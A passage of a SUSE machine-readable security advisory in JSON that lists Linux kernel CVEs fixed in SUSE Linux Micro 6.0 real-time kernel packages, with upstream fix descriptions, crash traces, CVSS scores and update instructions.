"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54170",
"url": "https://www.suse.com/security/cve/CVE-2023-54170"
},
{
"category": "external",
"summary": "SUSE Bug 1256045 for CVE-2023-54170",
"url": "https://bugzilla.suse.com/1256045"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54170"
},
{
"cve": "CVE-2023-54171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix memory leak of iter-\u003etemp when reading trace_pipe\n\nkmemleak reports:\n unreferenced object 0xffff88814d14e200 (size 256):\n comm \"cat\", pid 336, jiffies 4294871818 (age 779.490s)\n hex dump (first 32 bytes):\n 04 00 01 03 00 00 00 00 08 00 00 00 00 00 00 00 ................\n 0c d8 c8 9b ff ff ff ff 04 5a ca 9b ff ff ff ff .........Z......\n backtrace:\n [\u003cffffffff9bdff18f\u003e] __kmalloc+0x4f/0x140\n [\u003cffffffff9bc9238b\u003e] trace_find_next_entry+0xbb/0x1d0\n [\u003cffffffff9bc9caef\u003e] trace_print_lat_context+0xaf/0x4e0\n [\u003cffffffff9bc94490\u003e] print_trace_line+0x3e0/0x950\n [\u003cffffffff9bc95499\u003e] tracing_read_pipe+0x2d9/0x5a0\n [\u003cffffffff9bf03a43\u003e] vfs_read+0x143/0x520\n [\u003cffffffff9bf04c2d\u003e] ksys_read+0xbd/0x160\n [\u003cffffffff9d0f0edf\u003e] do_syscall_64+0x3f/0x90\n [\u003cffffffff9d2000aa\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nwhen reading file \u0027trace_pipe\u0027, \u0027iter-\u003etemp\u0027 is allocated or relocated\nin trace_find_next_entry() but not freed before \u0027trace_pipe\u0027 is closed.\n\nTo fix it, free \u0027iter-\u003etemp\u0027 in tracing_release_pipe().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54171",
"url": "https://www.suse.com/security/cve/CVE-2023-54171"
},
{
"category": "external",
"summary": "SUSE Bug 1256034 for CVE-2023-54171",
"url": "https://bugzilla.suse.com/1256034"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54171"
},
{
"cve": "CVE-2023-54172",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54172"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/hyperv: Disable IBT when hypercall page lacks ENDBR instruction\n\nOn hardware that supports Indirect Branch Tracking (IBT), Hyper-V VMs\nwith ConfigVersion 9.3 or later support IBT in the guest. However,\ncurrent versions of Hyper-V have a bug in that there\u0027s not an ENDBR64\ninstruction at the beginning of the hypercall page. Since hypercalls are\nmade with an indirect call to the hypercall page, all hypercall attempts\nfail with an exception and Linux panics.\n\nA Hyper-V fix is in progress to add ENDBR64. But guard against the Linux\npanic by clearing X86_FEATURE_IBT if the hypercall page doesn\u0027t start\nwith ENDBR. The VM will boot and run without IBT.\n\nIf future Linux 32-bit kernels were to support IBT, additional hypercall\npage hackery would be needed to make IBT work for such kernels in a\nHyper-V VM.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54172",
"url": "https://www.suse.com/security/cve/CVE-2023-54172"
},
{
"category": "external",
"summary": "SUSE Bug 1256033 for CVE-2023-54172",
"url": "https://bugzilla.suse.com/1256033"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54172"
},
{
"cve": "CVE-2023-54173",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54173"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Disable preemption in bpf_event_output\n\nWe received report [1] of kernel crash, which is caused by\nusing nesting protection without disabled preemption.\n\nThe bpf_event_output can be called by programs executed by\nbpf_prog_run_array_cg function that disabled migration but\nkeeps preemption enabled.\n\nThis can cause task to be preempted by another one inside the\nnesting protection and lead eventually to two tasks using same\nperf_sample_data buffer and cause crashes like:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000001\n #PF: supervisor instruction fetch in kernel mode\n #PF: error_code(0x0010) - not-present page\n ...\n ? perf_output_sample+0x12a/0x9a0\n ? finish_task_switch.isra.0+0x81/0x280\n ? perf_event_output+0x66/0xa0\n ? bpf_event_output+0x13a/0x190\n ? bpf_event_output_data+0x22/0x40\n ? bpf_prog_dfc84bbde731b257_cil_sock4_connect+0x40a/0xacb\n ? xa_load+0x87/0xe0\n ? __cgroup_bpf_run_filter_sock_addr+0xc1/0x1a0\n ? release_sock+0x3e/0x90\n ? sk_setsockopt+0x1a1/0x12f0\n ? udp_pre_connect+0x36/0x50\n ? inet_dgram_connect+0x93/0xa0\n ? __sys_connect+0xb4/0xe0\n ? udp_setsockopt+0x27/0x40\n ? __pfx_udp_push_pending_frames+0x10/0x10\n ? __sys_setsockopt+0xdf/0x1a0\n ? __x64_sys_connect+0xf/0x20\n ? do_syscall_64+0x3a/0x90\n ? entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nFixing this by disabling preemption in bpf_event_output.\n\n[1] https://github.com/cilium/cilium/issues/26756",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54173",
"url": "https://www.suse.com/security/cve/CVE-2023-54173"
},
{
"category": "external",
"summary": "SUSE Bug 1255996 for CVE-2023-54173",
"url": "https://bugzilla.suse.com/1255996"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54173"
},
{
"cve": "CVE-2023-54177",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54177"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nquota: fix warning in dqgrab()\n\nThere\u0027s issue as follows when do fault injection:\nWARNING: CPU: 1 PID: 14870 at include/linux/quotaops.h:51 dquot_disable+0x13b7/0x18c0\nModules linked in:\nCPU: 1 PID: 14870 Comm: fsconfig Not tainted 6.3.0-next-20230505-00006-g5107a9c821af-dirty #541\nRIP: 0010:dquot_disable+0x13b7/0x18c0\nRSP: 0018:ffffc9000acc79e0 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88825e41b980\nRDX: 0000000000000000 RSI: ffff88825e41b980 RDI: 0000000000000002\nRBP: ffff888179f68000 R08: ffffffff82087ca7 R09: 0000000000000000\nR10: 0000000000000001 R11: ffffed102f3ed026 R12: ffff888179f68130\nR13: ffff888179f68110 R14: dffffc0000000000 R15: ffff888179f68118\nFS: 00007f450a073740(0000) GS:ffff88882fc00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe96f2efd8 CR3: 000000025c8ad000 CR4: 00000000000006e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n dquot_load_quota_sb+0xd53/0x1060\n dquot_resume+0x172/0x230\n ext4_reconfigure+0x1dc6/0x27b0\n reconfigure_super+0x515/0xa90\n __x64_sys_fsconfig+0xb19/0xd20\n do_syscall_64+0x39/0xb0\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nAbove issue may happens as follows:\nProcessA ProcessB ProcessC\nsys_fsconfig\n vfs_fsconfig_locked\n reconfigure_super\n ext4_remount\n dquot_suspend -\u003e suspend all type quota\n\n sys_fsconfig\n vfs_fsconfig_locked\n reconfigure_super\n ext4_remount\n dquot_resume\n ret = dquot_load_quota_sb\n add_dquot_ref\n do_open -\u003e open file O_RDWR\n vfs_open\n do_dentry_open\n get_write_access\n atomic_inc_unless_negative(\u0026inode-\u003ei_writecount)\n ext4_file_open\n dquot_file_open\n dquot_initialize\n __dquot_initialize\n dqget\n\t\t\t\t\t\t atomic_inc(\u0026dquot-\u003edq_count);\n\n __dquot_initialize\n __dquot_initialize\n dqget\n if (!test_bit(DQ_ACTIVE_B, \u0026dquot-\u003edq_flags))\n ext4_acquire_dquot\n\t\t\t -\u003e Return error DQ_ACTIVE_B flag isn\u0027t set\n dquot_disable\n\t\t\t invalidate_dquots\n\t\t\t if (atomic_read(\u0026dquot-\u003edq_count))\n\t dqgrab\n\t\t\t WARN_ON_ONCE(!test_bit(DQ_ACTIVE_B, \u0026dquot-\u003edq_flags))\n\t -\u003e Trigger warning\n\nIn the above scenario, \u0027dquot-\u003edq_flags\u0027 has no DQ_ACTIVE_B is normal when\ndqgrab().\nTo solve above issue just replace the dqgrab() use in invalidate_dquots() with\natomic_inc(\u0026dquot-\u003edq_count).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54177",
"url": "https://www.suse.com/security/cve/CVE-2023-54177"
},
{
"category": "external",
"summary": "SUSE Bug 1255993 for CVE-2023-54177",
"url": "https://bugzilla.suse.com/1255993"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54177"
},
{
"cve": "CVE-2023-54178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: unittest: fix null pointer dereferencing in of_unittest_find_node_by_name()\n\nwhen kmalloc() fail to allocate memory in kasprintf(), name\nor full_name will be NULL, strcmp() will cause\nnull pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54178",
"url": "https://www.suse.com/security/cve/CVE-2023-54178"
},
{
"category": "external",
"summary": "SUSE Bug 1255992 for CVE-2023-54178",
"url": "https://bugzilla.suse.com/1255992"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54178"
},
{
"cve": "CVE-2023-54179",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54179"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Array index may go out of bound\n\nKlocwork reports array \u0027vha-\u003ehost_str\u0027 of size 16 may use index value(s)\n16..19. Use snprintf() instead of sprintf().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54179",
"url": "https://www.suse.com/security/cve/CVE-2023-54179"
},
{
"category": "external",
"summary": "SUSE Bug 1255994 for CVE-2023-54179",
"url": "https://bugzilla.suse.com/1255994"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54179"
},
{
"cve": "CVE-2023-54181",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54181"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix issue in verifying allow_ptr_leaks\n\nAfter we converted the capabilities of our networking-bpf program from\ncap_sys_admin to cap_net_admin+cap_bpf, our networking-bpf program\nfailed to start. Because it failed the bpf verifier, and the error log\nis \"R3 pointer comparison prohibited\".\n\nA simple reproducer as follows,\n\nSEC(\"cls-ingress\")\nint ingress(struct __sk_buff *skb)\n{\n\tstruct iphdr *iph = (void *)(long)skb-\u003edata + sizeof(struct ethhdr);\n\n\tif ((long)(iph + 1) \u003e (long)skb-\u003edata_end)\n\t\treturn TC_ACT_STOLEN;\n\treturn TC_ACT_OK;\n}\n\nPer discussion with Yonghong and Alexei [1], comparison of two packet\npointers is not a pointer leak. This patch fixes it.\n\nOur local kernel is 6.1.y and we expect this fix to be backported to\n6.1.y, so stable is CCed.\n\n[1]. https://lore.kernel.org/bpf/CAADnVQ+Nmspr7Si+pxWn8zkE7hX-7s93ugwC+94aXSy4uQ9vBg@mail.gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54181",
"url": "https://www.suse.com/security/cve/CVE-2023-54181"
},
{
"category": "external",
"summary": "SUSE Bug 1255988 for CVE-2023-54181",
"url": "https://bugzilla.suse.com/1255988"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54181"
},
{
"cve": "CVE-2023-54183",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54183"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: v4l2-core: Fix a potential resource leak in v4l2_fwnode_parse_link()\n\nIf fwnode_graph_get_remote_endpoint() fails, \u0027fwnode\u0027 is known to be NULL,\nso fwnode_handle_put() is a no-op.\n\nRelease the reference taken from a previous fwnode_graph_get_port_parent()\ncall instead.\n\nAlso handle fwnode_graph_get_port_parent() failures.\n\nIn order to fix these issues, add an error handling path to the function\nand the needed gotos.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54183",
"url": "https://www.suse.com/security/cve/CVE-2023-54183"
},
{
"category": "external",
"summary": "SUSE Bug 1255990 for CVE-2023-54183",
"url": "https://bugzilla.suse.com/1255990"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54183"
},
{
"cve": "CVE-2023-54185",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54185"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: remove BUG_ON()\u0027s in add_new_free_space()\n\nAt add_new_free_space() we have these BUG_ON()\u0027s that are there to deal\nwith any failure to add free space to the in memory free space cache.\nSuch failures are mostly -ENOMEM that should be very rare. However there\u0027s\nno need to have these BUG_ON()\u0027s, we can just return any error to the\ncaller and all callers and their upper call chain are already dealing with\nerrors.\n\nSo just make add_new_free_space() return any errors, while removing the\nBUG_ON()\u0027s, and returning the total amount of added free space to an\noptional u64 pointer argument.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54185",
"url": "https://www.suse.com/security/cve/CVE-2023-54185"
},
{
"category": "external",
"summary": "SUSE Bug 1255984 for CVE-2023-54185",
"url": "https://bugzilla.suse.com/1255984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54185"
},
{
"cve": "CVE-2023-54189",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54189"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npstore/ram: Add check for kstrdup\n\nAdd check for the return value of kstrdup() and return the error\nif it fails in order to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
